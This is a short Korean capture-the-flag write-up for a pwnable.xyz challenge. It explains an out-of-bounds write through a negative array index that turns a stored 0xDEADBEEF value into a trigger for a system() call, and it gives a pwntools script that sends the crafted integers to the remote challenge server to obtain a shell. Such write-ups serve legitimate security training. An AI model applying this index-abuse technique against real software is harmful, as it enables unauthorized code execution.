How to Exploit
v7, v8, v9(9이하 -7이상)을 입력받고 v6[v9+6]=v7+v8을 수행한다. 만약 *v6+7 = 0xDEADBEEF에서 0xB000000B5가 되면 system함수 호출한다.
v9이 -5일 때, 0xdeadbe를 0xb000000로 바꿀 수 있고, v9이 -6일 때, 0xef를 0xb5로 바꿀 수 있다.
0xb500000000000000을 입력하니 0x7fffffffffffffff가 나온것으로 보아 음수를 넣어주어야 할 것 같다.
Exploit Code
from pwn import *
#p=process('./challenge')
p=remote('svc.pwnable.xyz', 30003)
p.sendline('-5404319552844595200 0 -6') #0xb5
p.recvline()
p.sendline('184549376 0 -5') #0xb000000
p.recvline()
p.sendline('a, 0, 0')
p.interactive()Capture the Flag
'Writeup [pwn] > pwnable.xyz' 카테고리의 다른 글
| TLSv00 (0) | 2020.03.07 |
|---|---|
| Sub (0) | 2020.03.07 |
| Note (0) | 2020.03.07 |
| GrownUp (0) | 2020.03.07 |
| Add (0) | 2020.03.07 |